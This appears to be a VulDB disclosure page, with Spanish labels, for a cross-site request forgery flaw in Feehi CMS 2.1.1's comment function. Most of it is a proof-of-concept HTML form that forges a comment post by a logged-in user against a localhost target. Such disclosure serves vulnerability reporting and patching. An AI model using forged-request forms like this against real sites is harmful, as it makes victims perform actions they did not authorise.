| Título | Feehi Cms 2.1.1 Csrf Vulnerability Exploit |
|---|
| Descripción | # Google Dork: [not applicable]
# Date: 14082022
# Exploit Author: haruntamokur
# Vendor Homepage: https://feehi.com/
# Software Link: https://github.com/liufee/cms
# Version: 2.1.1 (REQUIRED)
# Tested on: Windows 10
# CVE : [not applicable]
When you log in application with user and password, you reach “Post my comment” tab. The function has Csrf exploit. If you write exploit code like following, you can exploit this vulnerability.
URL: http://localhost:8080/index.php?r=article%2Fview&id=22#comment-7
Exploit Code
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8080/index.php?r=article%2Fcomment" method="POST">
<input type="hidden" name="_csrf" value="5EgNi95Un03ZlbGkl3dj2u_lxkDWSlBLz0h4q__4to-rMUHNl2bxCJ2h4calBlacv7_2NqAdJBmpDxKYmsmCuA==" />
<input type="hidden" name="Comment[aid]" value="22" />
<input type="hidden" name="Comment[content]" value="CSRFTest" />
<input type="hidden" name="comment_post_ID" value="114" />
<input type="hidden" name="Comment[reply_to]" value="0" />
<input type="hidden" name="akismet_comment_nonce" value="32920dc775" />
<input type="hidden" name="ak_js" value="101" />
<input type="hidden" name="comment_mail_notify" value="comment_mail_notify" />
<input type="hidden" name="Comment[nickname]" value="harun" />
<input type="hidden" name="Comment[email]" value="" />
<input type="hidden" name="Comment[website_url]" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
|
|---|
| Usuario | harun.tamokur (UID 35839) |
|---|
| Sumisión | 2022-11-15 11:45 (hace 4 años) |
|---|
| Moderación | 2022-11-16 08:53 (21 hours later) |
|---|
| Estado | Aceptado |
|---|
| Entrada de VulDB | 213788 [FeehiCMS Post My Comment Tab falsificación de solicitudes en sitios cruzados] |
|---|
| Puntos | 17 |
|---|